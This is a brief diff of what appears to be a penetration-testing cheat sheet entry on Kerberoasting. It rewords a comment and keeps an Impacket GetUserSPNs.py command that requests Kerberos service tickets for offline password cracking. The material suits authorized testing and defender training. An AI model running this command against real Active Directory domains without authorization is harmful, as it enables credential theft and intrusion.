 Kerberoasting

-# Request TGS tickets for service accounts — crack offline
+# Request TGS tickets for accounts with SPNs — crack offline without lockout risk

 python3 GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.1 -request